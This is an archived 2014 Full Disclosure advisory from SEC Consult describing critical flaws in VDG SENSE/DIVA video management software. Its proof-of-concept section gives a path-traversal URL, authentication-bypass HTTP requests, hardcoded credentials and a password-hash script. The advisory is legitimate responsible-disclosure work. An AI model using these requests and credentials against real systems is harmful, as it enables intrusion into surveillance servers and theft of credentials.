lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <5492D78E.9070000@sec-consult.com>
Date: Thu, 18 Dec 2014 14:33:02 +0100
From: SEC Consult Vulnerability Lab <research@...-consult.com>
To: <fulldisclosure@...lists.org>, <bugtraq@...urityfocus.com>
Subject: [FD] SEC Consult SA-20141218-0 :: Multiple critical vulnerabilities
 in VDG Security SENSE (formerly DIVA)

SEC Consult Vulnerability Lab Security Advisory < 20141218-0 >
=======================================================================
              title: Multiple critical vulnerabilities
            product: VDG Security SENSE (formerly DIVA)
 vulnerable version: 2.3.13
      fixed version: unknown - no vendor confirmation
             impact: critical
           homepage: https://vdgsecurity.com/
              found: 2014-10-01
                 by: Stefan Viehböck
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"VDG Sense is our video management system (VMS). VDG Sense gives you control
of all live images and stored video data, in a user-friendly interface. Our
solution is based on an open platform, tailored to your specific needs and
requirements and ready to be integrated in any security solution."
Source: https://vdgsecurity.com/sense/

"DIVA is our former trademark, which we used to brand our video management
software and other VDG products. With the launch of our new trademark, VDG
Sense, we have rebranded the software to VDG Sense and promote it as such
from September 15, 2014. Other products, such as our servers, are available
under the label VDG."
Source: https://vdgsecurity.com/diva/


Business recommendation:
------------------------
Attackers are able to completely compromise the VDG SENSE server as they can
gain access at the system level. SENSE server can be used as an entry point
into the target infrastructure (lateral movement, privilege escalation).

It is highly recommended by SEC Consult not to use this software until a
thorough security review has been performed by security professionals and all
identified issues have been resolved.

Although the vendor does not respond to our mails any more, some
vulnerabilities seem to be fixed in the most recent version of SENSE (2.3.15).
It is assumed that further critical vulnerabilities exist.


Vulnerability overview/description:
-----------------------------------
1) Unauthenticated local file disclosure
Unauthenticated users can read arbitrary files from the filesystem with the
privileges of the "SYSTEM" operating system user. These files include
configuration files containing sensitive information such as clear text
passwords/password hashes which can be used in further attacks.


2) Authentication bypass / Clear text password disclosure
Some parts of the DIVA application are vulnerable to authentication bypass. This
allows attackers to update DIVA plugin configuration. Furthermore DIVA plugin
configurations can be read. This configuration includes clear text DIVA
administrator credentials as DIVA plugins requires access to such an account
for operation.


3) Insecure service configuration / Hardcoded default credentials - Postgres
The PostgreSQL database is offered via the network (TCP port 5432) and can be
accessed remotely using hardcoded credentials which can't be changed.


4) Hardcoded default credentials - Windows Users
Several local Windows users are created in the course of the DIVA setup. These
are used to run some of the DIVA services. These users can be used to log on to the
server running DIVA.


5) Critical information disclosure / User database leakage
After authentication with the DIVA (fat) client via the proprietary protocol
(TCP port 51410) the server returns the contents of the user database
to the client. This works regardless of whether the user has administrator
rights or not.
The user database (users.ini) contains all users and their password hashes.
This information is sufficient to log in as another user. An attacker does not
require knowledge about plain text passwords.


6) Use of plain text protocols
All DIVA communication transport channels (eg. vie TCP port 80, 51410) lack
encryption.


7) Buffer overflow vulnerabilities
The DIVA web service API (/webservice) is vulnerable to a stack based buffer
overflow when processing "AuthenticateUser" requests. Both the "user" and the
"password" parameter are vulnerable.
None of the DIVA modules are ASLR-enabled. An exploit that uses ROP to bypass
DEP has been implemented.


Proof of concept:
-----------------
1) Unauthenticated local file disclosure
Arbitrary files can be downloaded because of vulnerabilities in the proprietary
web server implementation. An example for the x64 hosts:
http://<host>/images/../../../../Windows/SysWOW64/config/systemprofile/AppData/Roaming/Diva/Settings/users.ini

Interesting DIVA-specific files:
config/systemprofile/AppData/Roaming/Diva/Settings/users.ini (DIVA user database)
config/systemprofile/AppData/Roaming/Diva/DivaManager/DivaManager.ini (contains DIVA
"master user")
config/systemprofile/AppData/Roaming/Diva/DivaManager/Plugins/ (DIVA plugin
configurations)
[...]


2) Authentication bypass / Clear text password disclosure
Authentication for parts of the application can be bypassed by sending the HTTP
Authorization header containing a colon ":".

GET /plugins/divacal/getsettings?sessionkey= HTTP/1.1
Host: <host>
Authorization: Basic Og==

The response contains the plugin configuration for "divacal":

HTTP/1.1 200 OK
Date: Thu, 23 Okt 2014 10:46:28 GMT
Server: Diva HTTP Plugin 2.0
Accept-Ranges: bytes
Connection: Keep-Alive
Content-Type: application/xml; charset=UTF-8
Content-Length: 1179

<?xml version="1.0" ?>
<?xml-stylesheet type="text/xsl" href="../../xml/settings.xsl" ?>
<settings>
  <name>DivaCal settings</name>
  <group>
    <id>0</id>
    <name>DIVA Connection</name>
    <singleinstance>yes</singleinstance>
    <showbuttons>yes</showbuttons>
    <subgroup>
[...]
      <setting>
        <id>1</id>
        <name>DIVAUsername</name>
        <type>string</type>
        <value>Administrator</value>
        <default>Administrator</default>
        <help>The username used to login to to the DIVA management server.</help>
      </setting>
      <setting>
        <id>2</id>
        <name>DIVAPassword</name>
        <type>password</type>
        <value>!DVadmin</value>
        <default>!DVadmin</default>
        <help>The password required to login to the DIVA management server.</help>
      </setting>
    </subgroup>
  </group>
</settings>

Other activated plugins can be queried via the following request:
GET /plugins/?sessionkey= HTTP/1.1
Host: <host>
Authorization: Basic Og==


Plugin settings can be updated as follows:
POST /plugins/http/updatesettings?sessionkey= HTTP/1.1
Host: <host>
Authorization: Basic Og==
Content-Length: 29

groupid=0&DocumentRoot=htdocs


3) Insecure service configuration / Hardcoded default credentials - Postgres
The Postgres root user is as follows:

Username: root
Password: ArpaRomaWi


4) Hardcoded default credentials - Windows Users
The created Windows users are as follows:

Username: postgres
Password: !DVService

Username: NTP
Password: !DVService


5) Critical information disclosure / User database leakage
Below is an excerpt from the DIVA protocol communication (TCP port 51410):
    00000000  48 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 H....... ........ <-
SERVER
    00000010  00 00 00 00 0d 00 00 20  01 00 02 20 03 00 00 20 .......  ... ...
    00000020  06 00 11 00 32 2e 33 2e  31 33 00 00 02 00 00 20 ....2.3. 13.....
    00000030  01 00 02 40 04 00 00 00  04 00 00 20 06 00 11 00 ...@.... ... ....
    00000040  44 69 76 61 20 73 65 72  76 65 72 00             Diva ser ver.
00000000  b8 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........     <-
CLIENT
00000010  00 00 00 00 29 00 00 20  c9 00 02 40 05 00 00 20 ....)..  ...@...
Note: client sends passwordHash and digestHash
00000020  f6 01 01 40 61 64 6d 69  6e 69 73 74 72 61 74 6f ...@...i nistrato
00000030  72 00 00 00 09 00 00 20  f7 01 01 40 49 41 68 6b r......  ...@...k
00000040  43 72 33 61 68 7a 59 39  67 53 57 73 56 37 33 6b Cr3ahzY9 gSWsV73k
00000050  41 42 32 64 51 79 38 3d  00 00 00 00 0a 00 00 20 AB2dQy8= .......
00000060  fa 01 01 40 35 34 38 31  35 36 32 31 38 64 33 65 ...@...1 56218d3e
00000070  31 63 35 35 66 63 30 30  35 65 38 32 61 32 32 30 1c55fc00 5e82a220
00000080  61 34 63 30 00 00 00 00  02 00 00 20 05 00 11 40 a4c0.... ... ...@
00000090  02 00 00 00 03 00 00 20  0b 00 11 40 00 00 00 00 .......  ...@....
000000A0  00 00 00 00 02 00 00 20  0f 00 11 40 00 00 00 00 .......  ...@....
000000B0  02 00 00 20 02 00 11 40  00 00 00 00             ... ...@ ....
    0000004C  30 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 0....... ........ <-
SERVER
    0000005C  00 00 00 00 07 00 00 20  ca 00 02 40 02 00 00 20 .......  ...@...
    0000006C  f5 01 01 40 01 00 00 00  02 00 00 20 02 00 11 40 ...@.... ... ...@
    0000007C  01 00 00 00                                      ....
000000BC  50 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 P....... ........     <-
CLIENT
000000CC  00 00 00 00 0f 00 00 20  01 00 1c 40 0b 00 00 20 .......  ...@...
000000DC  02 00 1c 40 47 45 54 20  2f 75 73 65 72 6d 61 6e ...@GET  /userman
000000EC  61 67 65 6d 65 6e 74 2f  6f 73 64 73 74 79 6c 65 agement/ osdstyle
000000FC  73 20 44 49 56 41 2f 31  2e 30 00 00 01 00 00 20 s DIVA/1 .0.....
0000010C  03 00 1c 40                                      ...@
    00000080  24 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 $....... ........ <-
SERVER
    00000090  00 00 00 00 04 00 00 20  07 01 11 40 02 00 00 20 .......  ...@...
    000000A0  06 00 11 00 00 00 00 00  24 00 00 00 00 00 00 00 ........ $.......
[...]
    00000200  9c 02 01 40 02 00 00 20  06 00 11 00 0d 0a 00 00 ...@...  ........
    00000210  bc 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
    00000220  00 00 00 00 2a 00 00 20  f4 01 01 40 28 00 00 20 ....*..  ...@(..
    00000230  06 00 11 00 5b 61 64 6d  69 6e 69 73 74 72 61 74 ....[adm inistrat -----
    00000240  6f 72 5d 0d 0a 61 64 6d  69 6e 72 69 67 68 74 73 or]..adm inrights |
    00000250  3d 31 0d 0a 61 6e 64 72  6f 69 64 3d 0d 0a 64 69 =1..andr oid=..di |
    00000260  67 65 73 74 48 61 73 68  3d 35 34 38 31 35 36 32 gestHash =5481562 |
    00000270  31 38 64 33 65 31 63 35  35 66 63 30 30 35 65 38 18d3e1c5 5fc005e8 |
    00000280  32 61 32 32 30 61 34 63  30 0d 0a 65 6d 61 69 6c 2a220a4c 0..email | <-
DIVA user database
    00000290  3d 0d 0a 66 75 6c 6c 6e  61 6d 65 3d 0d 0a 69 6f =..fulln ame=..io |
    000002A0  73 3d 0d 0a 70 61 73 73  77 6f 72 64 3d 49 41 68 s=..pass word=IAh |
    000002B0  6b 43 72 33 61 68 7a 59  39 67 53 57 73 56 37 33 kCr3ahzY 9gSWsV73 |
    000002C0  6b 41 42 32 64 51 79 38  3d 0d 0a 0d 0a 00 00 00 kAB2dQy8 =....... -----
    000002D0  24 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 $....... ........

For the sake of completeness the password hashing scheme has been reverse
engineered. As both hashes can be used for authentication directly, brute
force attacks against password hashes are not required.

#!/usr/bin/env python
import hashlib
from base64 import b64encode

user='administrator'
password='!DVadmin'

digestHash = hashlib.md5(user+":DIVA:"+password).digest().encode('hex').upper()
passwordHash = b64encode(hashlib.sha1(hashlib.sha1(password).digest()).digest())

print 'digestHash',digestHash
print 'passwordHash',passwordHash


6) Use of plain text protocols
No proof of concept necessary.


7) Buffer overflow vulnerabilities
Detailed proof of concept exploits have been removed for this vulnerability.



Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in 2.3.13, which was the most
recent version at the time of discovery.



Vendor contact timeline:
------------------------
2014-10-24: Sending responsible disclosure policy and requesting encryption
            keys.
2014-10-28: Vendor responds, provides encryption keys.
2014-10-29: Sending advisory and proof of concept exploit via encrypted
            channel.
2014-10-29: Vendor confirms receipt of advisory.
2014-11-10: Requesting status update.
2014-11-17: Vendor states that team is "very well on track to solve the
            issues".
2014-11-18: Clarifying criticality of vulnerabilities and viability of attack,
            even in closed networks; referring to Shodan search results.
2014-12-10: Requesting status update. No reply.
2014-12-18: SEC Consult releases security advisory.


Solution:
---------
It seems some of the vulnerabilities are fixed in the most recent version of
SENSE (2.3.15). The vendor stopped responding to our emails so we don't know
what vulnerabilities were actually fixed.


Workaround:
-----------
No workaround available.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone:   +43 1 8903043 0
Fax:     +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested in working with the experts of SEC Consult?
Write to career@...-consult.com

EOF Stefan Viehböck / @2014


Download attachment "signature.asc" of type "application/pgp-signature" (820 bytes)


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ